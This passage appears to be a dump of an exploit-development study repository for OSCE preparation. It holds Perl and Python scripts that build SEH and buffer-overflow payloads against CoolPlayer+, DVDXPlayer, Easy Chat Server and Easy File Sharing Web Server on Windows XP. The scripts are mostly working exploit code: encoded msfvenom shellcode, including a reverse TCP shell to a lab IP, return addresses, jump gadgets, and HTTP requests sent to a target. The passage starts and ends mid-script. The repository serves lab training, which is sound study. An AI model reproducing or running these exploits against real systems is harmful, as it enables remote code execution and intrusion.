| "\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e" . 16 | "\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c" . 
17 | "\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x4f\x46" . 18 | "\x21\x01\x68\x61\x64\x20\x42\x68\x20\x50\x6f\x70\x89\xe1\xfe" . 19 | "\x49\x0b\x31\xc0\x51\x50\xff\xd7"; 20 | 21 | my $sploit = $junk.$eip.$regs.$esp.$nops.$shell; # build sploit portion of buffer 22 | my $fill = "\x43" x ($buffsize - (length($sploit))); # fill remainder of buffer 23 | my $buffer = $sploit.$fill; # build final buffer 24 | 25 | 26 | # write the exploit buffer to file 27 | my $file = "coolplayer_popad2.m3u"; 28 | open(FILE, ">$file"); 29 | print FILE $buffer; 30 | close(FILE); 31 | print "Exploit file [" . $file . "] created\n"; 32 | print "Buffer size: " . length($buffer) . "\n"; 33 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/push(reg)+ret/coolplayer_shellcode_pushregret_calc.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $buffsize = 10000; #set consistent buffer size 4 | 5 | my $jmp = "\x83\xc3\x64" x 3; #add 300 to ebx 6 | $jmp = $jmp . "\xff\xe3"; # jmp ebx 7 | my $junk = "\x41" x (260 - length($jmp)); #offset to EIP 8 | my $eip = pack("V", 0x7CA5F15B); #call ebx from kernel32.dll 9 | 10 | my $nops = "\x90" x 50; 11 | 12 | #msfvenom -a x86 -p windows/exec CMD=calc.exe -e x86/shikata_ga_nai -b '\x00\x0a\x0d\xff' -f perl 13 | 14 | my $shell = "\xdb\xcf\xb8\x27\x17\x16\x1f\xd9\x74\x24\xf4\x5f\x2b\xc9" . 15 | "\xb1\x33\x31\x47\x17\x83\xef\xfc\x03\x60\x04\xf4\xea\x92" . 16 | "\xc2\x71\x14\x6a\x13\xe2\x9c\x8f\x22\x30\xfa\xc4\x17\x84" . 17 | "\x88\x88\x9b\x6f\xdc\x38\x2f\x1d\xc9\x4f\x98\xa8\x2f\x7e" . 18 | "\x19\x1d\xf0\x2c\xd9\x3f\x8c\x2e\x0e\xe0\xad\xe1\x43\xe1" . 19 | "\xea\x1f\xab\xb3\xa3\x54\x1e\x24\xc7\x28\xa3\x45\x07\x27" . 20 | "\x9b\x3d\x22\xf7\x68\xf4\x2d\x27\xc0\x83\x66\xdf\x6a\xcb" . 21 | "\x56\xde\xbf\x0f\xaa\xa9\xb4\xe4\x58\x28\x1d\x35\xa0\x1b" . 22 | "\x61\x9a\x9f\x94\x6c\xe2\xd8\x12\x8f\x91\x12\x61\x32\xa2" . 
23 | "\xe0\x18\xe8\x27\xf5\xba\x7b\x9f\xdd\x3b\xaf\x46\x95\x37" . 24 | "\x04\x0c\xf1\x5b\x9b\xc1\x89\x67\x10\xe4\x5d\xee\x62\xc3" . 25 | "\x79\xab\x31\x6a\xdb\x11\x97\x93\x3b\xfd\x48\x36\x37\xef" . 26 | "\x9d\x40\x1a\x65\x63\xc0\x20\xc0\x63\xda\x2a\x62\x0c\xeb" . 27 | "\xa1\xed\x4b\xf4\x63\x4a\xa3\xbe\x2e\xfa\x2c\x67\xbb\xbf" . 28 | "\x30\x98\x11\x83\x4c\x1b\x90\x7b\xab\x03\xd1\x7e\xf7\x83" . 29 | "\x09\xf2\x68\x66\x2e\xa1\x89\xa3\x4d\x24\x1a\x2f\xbc\xc3" . 30 | "\x9a\xca\xc0"; 31 | 32 | my $sploit = $jmp.$junk.$eip.$nops.$shell; #build sploit portion of buffer 33 | my $fill = "\x43" x ($buffsize - (length($sploit))); # fill remainder of buffer for size consistency 34 | my $buffer = $sploit.$fill; # build final buffer 35 | 36 | # write the exploit buffer to file 37 | 38 | my $file = "coolplayer_shellcode_subregjump_calc.m3u"; 39 | open(FILE, ">$file"); 40 | print FILE $buffer; 41 | close(FILE); 42 | print "Exploit file created [" . $file . "]\n"; 43 | print "Buffer size: " . length($buffer). 
"\n"; 44 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/push(reg)+ret/coolplayer_shellcode_subregjump_calc.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/push(reg)+ret/coolplayer_shellcode_subregjump_calc.m3u -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/shortjump/coolplayer_shortjump.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/shortjump/coolplayer_shortjump.m3u -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/sub(reg)+jmp/coolplayer_shellcode_subregjump_calc.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $buffsize = 10000; #set consistent buffer size 4 | 5 | my $jmp = "\x83\xec\x64" x 2; #decrement esp by 200 6 | $jmp = $jmp . "\x83\xec\x28"; #decrement esp by 40 7 | $jmp = $jmp . "\xff\xe4"; #jmp esp 8 | 9 | #msfvenom -a x86 -p windows/exec CMD=calc.exe -e x86/shikata_ga_nai -b '\x00\x0a\x0d\xff' -f perl 10 | 11 | my $shell = "\xbb\xa4\x12\xda\x1e\xda\xc5\xd9\x74\x24\xf4\x5f\x29\xc9" . 12 | "\xb1\x31\x31\x5f\x13\x83\xef\xfc\x03\x5f\xab\xf0\x2f\xe2" . 13 | "\x5b\x76\xcf\x1b\x9b\x17\x59\xfe\xaa\x17\x3d\x8a\x9c\xa7" . 14 | "\x35\xde\x10\x43\x1b\xcb\xa3\x21\xb4\xfc\x04\x8f\xe2\x33" . 15 | "\x95\xbc\xd7\x52\x15\xbf\x0b\xb5\x24\x70\x5e\xb4\x61\x6d" . 16 | "\x93\xe4\x3a\xf9\x06\x19\x4f\xb7\x9a\x92\x03\x59\x9b\x47" . 17 | "\xd3\x58\x8a\xd9\x68\x03\x0c\xdb\xbd\x3f\x05\xc3\xa2\x7a" . 
18 | "\xdf\x78\x10\xf0\xde\xa8\x69\xf9\x4d\x95\x46\x08\x8f\xd1" . 19 | "\x60\xf3\xfa\x2b\x93\x8e\xfc\xef\xee\x54\x88\xeb\x48\x1e" . 20 | "\x2a\xd0\x69\xf3\xad\x93\x65\xb8\xba\xfc\x69\x3f\x6e\x77" . 21 | "\x95\xb4\x91\x58\x1c\x8e\xb5\x7c\x45\x54\xd7\x25\x23\x3b" . 22 | "\xe8\x36\x8c\xe4\x4c\x3c\x20\xf0\xfc\x1f\x2e\x07\x72\x1a" . 23 | "\x1c\x07\x8c\x25\x30\x60\xbd\xae\xdf\xf7\x42\x65\xa4\x08" . 24 | "\x09\x24\x8c\x80\xd4\xbc\x8d\xcc\xe6\x6a\xd1\xe8\x64\x9f" . 25 | "\xa9\x0e\x74\xea\xac\x4b\x32\x06\xdc\xc4\xd7\x28\x73\xe4" . 26 | "\xfd\x4a\x12\x76\x9d\xa2\xb1\xfe\x04\xbb"; 27 | 28 | my $nops = "\x90" x (260 - ((length($jmp) + length($shell)))); #260 is offset to eip 29 | my $eip = pack('V', 0x7c810395); #call ebx from kernel32.dll 30 | 31 | my $sploit = $jmp.$nops.$shell.$eip; #build sploit portion of buffer 32 | my $fill = "\x43" x ($buffsize - (length($sploit))); # fill remainder of buffer for size consistency 33 | my $buffer = $sploit.$fill; # build final buffer 34 | 35 | # write the exploit buffer to file 36 | 37 | my $file = "coolplayershell_subregjump_calc.m3u"; 38 | open(FILE, ">$file"); 39 | print FILE $buffer; 40 | close(FILE); 41 | print "Exploit file created [" . $file . "]\n"; 42 | print "Buffer size: " . length($buffer). 
"\n"; 43 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/sub(reg)+jmp/coolplayershell_subregjump_calc.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/sub(reg)+jmp/coolplayershell_subregjump_calc.m3u -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/dvdxplayer/dvdxplayer_crash.plf: -------------------------------------------------------------------------------- 1 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/dvdxplayer/dvdxplayer_crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python -w 2 | 3 | filename="dvdxplayer_crash.plf" 4 | 5 | buffer = "A"*2000 6 | 7 | textfile = open(filename, 'w') 8 | textfile.write(buffer) 9 | textfile.close() 10 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/dvdxplayer/dvdxplayer_patt_nSEH.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python -w 2 | 3 | filename="dvdxplayer_patt_nSEH.plf" 4 | 5 | #---------------------------------------------------------------------------# 6 | # (*) badchars = '\x00\x0A\x0D\x1A' # 7 | # # 8 | # offset to: (2) nseh 608-bytes, (1) seh 112-bytes # 9 | # (2) nseh = ???? 
# 10 | # (1) seh = 0x61617619 : pop esi # pop edi # ret | EPG.dll # 11 | # (3) shellcode space = 1384-bytes # 12 | #---------------------------------------------------------------------------# 13 | 14 | buffer = "A"*608 + "B"*4 + "\x19\x76\x61\x61" + "D"*1384 15 | 16 | textfile = open(filename, 'w') 17 | textfile.write(buffer) 18 | textfile.close() 19 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/dvdxplayer/dvdxplayer_patt_nSEH_SEH.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python -w 2 | 3 | filename="dvdxplayer_patt_nSEH.plf" 4 | 5 | #---------------------------------------------------------------------------# 6 | # (*) badchars = '\x00\x0A\x0D\x1A' # 7 | # # 8 | # offset to: (2) nseh 608-bytes, (1) seh 112-bytes # 9 | # (2) nseh = ???? # 10 | # (1) seh = 0x61617619 : pop esi # pop edi # ret | EPG.dll # 11 | # (3) shellcode space = 1384-bytes # 12 | #---------------------------------------------------------------------------# 13 | 14 | buffer = "A"*608 + "\xEB\x06\x90\x90" + "\x19\x76\x61\x61" + "D"*1384 15 | 16 | textfile = open(filename, 'w') 17 | textfile.write(buffer) 18 | textfile.close() 19 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/dvdxplayer/dvdxplayer_patt_overwrite.plf: -------------------------------------------------------------------------------- 1 | 
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co
 -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/dvdxplayer/dvdxplayer_patt_shellcode.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python -w 2 | 3 | filename="dvdxplayer_patt_shellcode.plf" 4 | 5 | #msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=172.16.73.129 #LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x1a' -f #c 6 | 7 | shellcode = ("\xbb\xe8\xe1\x4f\xb9\xda\xd6\xd9\x74\x24\xf4\x5a\x33\xc9\xb1" 8 | "\x52\x31\x5a\x12\x03\x5a\x12\x83\x02\x1d\xad\x4c\x2e\x36\xb0" 9 | "\xaf\xce\xc7\xd5\x26\x2b\xf6\xd5\x5d\x38\xa9\xe5\x16\x6c\x46" 10 | "\x8d\x7b\x84\xdd\xe3\x53\xab\x56\x49\x82\x82\x67\xe2\xf6\x85" 11 | "\xeb\xf9\x2a\x65\xd5\x31\x3f\x64\x12\x2f\xb2\x34\xcb\x3b\x61" 12 | "\xa8\x78\x71\xba\x43\x32\x97\xba\xb0\x83\x96\xeb\x67\x9f\xc0" 13 | "\x2b\x86\x4c\x79\x62\x90\x91\x44\x3c\x2b\x61\x32\xbf\xfd\xbb" 14 | "\xbb\x6c\xc0\x73\x4e\x6c\x05\xb3\xb1\x1b\x7f\xc7\x4c\x1c\x44" 15 | "\xb5\x8a\xa9\x5e\x1d\x58\x09\xba\x9f\x8d\xcc\x49\x93\x7a\x9a" 16 | "\x15\xb0\x7d\x4f\x2e\xcc\xf6\x6e\xe0\x44\x4c\x55\x24\x0c\x16" 17 | "\xf4\x7d\xe8\xf9\x09\x9d\x53\xa5\xaf\xd6\x7e\xb2\xdd\xb5\x16" 18 | "\x77\xec\x45\xe7\x1f\x67\x36\xd5\x80\xd3\xd0\x55\x48\xfa\x27" 19 | "\x99\x63\xba\xb7\x64\x8c\xbb\x9e\xa2\xd8\xeb\x88\x03\x61\x60" 20 | "\x48\xab\xb4\x27\x18\x03\x67\x88\xc8\xe3\xd7\x60\x02\xec\x08" 21 | "\x90\x2d\x26\x21\x3b\xd4\xa1\xe2\xac\x9f\xb0\x93\xce\x1f\xa2" 22 | "\x3f\x46\xf9\xae\xaf\x0e\x52\x47\x49\x0b\x28\xf6\x96\x81\x55" 23 | "\x38\x1c\x26\xaa\xf7\xd5\x43\xb8\x60\x16\x1e\xe2\x27\x29\xb4" 24 | "\x8a\xa4\xb8\x53\x4a\xa2\xa0\xcb\x1d\xe3\x17\x02\xcb\x19\x01" 25 | "\xbc\xe9\xe3\xd7\x87\xa9\x3f\x24\x09\x30\xcd\x10\x2d\x22\x0b" 26 | "\x98\x69\x16\xc3\xcf\x27\xc0\xa5\xb9\x89\xba\x7f\x15\x40\x2a" 27 | "\xf9\x55\x53\x2c\x06\xb0\x25\xd0\xb7\x6d\x70\xef\x78\xfa\x74" 28 | "\x88\x64\x9a\x7b\x43\x2d\xaa\x31\xc9\x04\x23\x9c\x98\x14\x2e" 29 | 
"\x1f\x77\x5a\x57\x9c\x7d\x23\xac\xbc\xf4\x26\xe8\x7a\xe5\x5a" 30 | "\x61\xef\x09\xc8\x82\x3a") 31 | 32 | evil = "\x90"*20 + shellcode 33 | buffer += "A"*608 + "\xEB\x06\x90\x90" + "\x19\x76\x61\x61" + "B"*(1384-len(evil)) 34 | 35 | textfile = open(filename, 'w') 36 | textfile.write(buffer) 37 | textfile.close() 38 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/easychatserver/easychatserver_eip_fuzz.py: -------------------------------------------------------------------------------- 1 | import string, sys 2 | import socket, httplib 3 | 4 | buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B" 5 | 6 | url = "/chat.ghp?username=" + buffer + "&password=" + buffer + "&room=1&sex=2" 7 | 8 | print "Running...\r\n" 9 | print url 10 | 11 | conn = httplib.HTTPConnection("172.16.73.129",80) 12 | conn.request("GET", url) 13 | r1 = conn.getresponse() 14 | print r1.status, r1.reason 15 | conn.close() 16 | 
# ==== /BoF/SEH-BoF/windows_xp_sp3/easychatserver/easychatserver_fuzz.py ====
#!/usr/bin/python

# Crash probe for Easy Chat Server's /chat.ghp login handler: the username
# and password query parameters are both filled with 2000 bytes of "A" and
# the status line of whatever the server answers is printed.  Python 2
# script (httplib, print statements); string/sys/socket are imported but
# never used.
import string, sys
import socket, httplib

payload = "A" * 2000

# Same parameter layout as a normal login; only the two credential fields
# are oversized, so a request of this shape stands out in the server log.
url = "/chat.ghp?username=%s&password=%s&room=1&sex=2" % (payload, payload)

print "Running...\r\n"
print url

# No timeout is passed to HTTPConnection, so a target that dies without
# replying leaves the script blocked in getresponse().
http = httplib.HTTPConnection("172.16.73.129", 80)
http.request("GET", url)
resp = http.getresponse()
print resp.status, resp.reason
http.close()


# ==== /BoF/SEH-BoF/windows_xp_sp3/easychatserver/easychatserver_fuzz2.py ====
# Follow-up to easychatserver_fuzz.py: 220 bytes of filler, a four-byte
# marker (the literal reads as the dword 0xDEADBEEF little-endian), then
# 500 bytes of "B" -- presumably so the debugger shows which part of the
# input lands where.  Request path and target are unchanged.
import string, sys
import socket, httplib

payload = "".join(["A" * 220, "\xEF\xBE\xAD\xDE", "B" * 500])

url = "/chat.ghp?username=%s&password=%s&room=1&sex=2" % (payload, payload)

print "Running...\r\n"
print url

# As above: no timeout, so a crashed target hangs the script here.
http = httplib.HTTPConnection("172.16.73.129", 80)
http.request("GET", url)
resp = http.getresponse()
print resp.status, resp.reason
http.close()


# ==== /BoF/SEH-BoF/windows_xp_sp3/easychatserver/easychatserver_overwrite_SEH.py ====
# Same request as the two scripts above with a three-part input: 216 bytes
# of "A", four bytes of "B", 500 bytes of "C".  The filler is four bytes
# shorter than in easychatserver_fuzz2.py; going by the file name the "B"
# block is meant to land on the next-SEH slot -- not verifiable from here.
import string, sys
import socket, httplib

payload = "".join(["A" * 216, "B" * 4, "C" * 500])

url = "/chat.ghp?username=%s&password=%s&room=1&sex=2" % (payload, payload)

print "Running...\r\n"
print url

# As above: no timeout on the connection.
http = httplib.HTTPConnection("172.16.73.129", 80)
http.request("GET", url)
resp = http.getresponse()
print resp.status, resp.reason
http.close()
-------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/easychatserver/easychatserver_shortjump.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import string, sys 4 | import socket, httplib 5 | 6 | buffer = "A"*216 7 | buffer += "\xEB\x06\x90\x90" #jump 6 bytes forward to our exploit code 8 | buffer += "\xD9\xC6\xBA\x7C" #pop,pop,ret 9 | buffer += "B"*500 10 | 11 | url = "/chat.ghp?username=" + buffer + "&password=" + buffer + "&room=1&sex=2" 12 | 13 | print "Running...\r\n" 14 | print url 15 | 16 | conn = httplib.HTTPConnection("172.16.73.129",80) 17 | conn.request("GET", url) 18 | r1 = conn.getresponse() 19 | print r1.status, r1.reason 20 | conn.close() 21 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/easyfilesharing_webserver/easyfilesharing_shellcode_calc_get.py: -------------------------------------------------------------------------------- 1 | #!/usr/share/python 2 | 3 | import socket 4 | import sys 5 | 6 | host = str(sys.argv[1]) 7 | port = int(sys.argv[2]) 8 | 9 | a = socket.socket() 10 | 11 | print "Connecting to: " + host + ":" + str(port) 12 | a.connect((host,port)) 13 | 14 | entire=4500 15 | 16 | # Junk 17 | buff = "A"*4061 18 | 19 | # Next SEH 20 | buff+= "\xeb\x0A\x90\x90" 21 | 22 | # pop pop ret 23 | buff+= 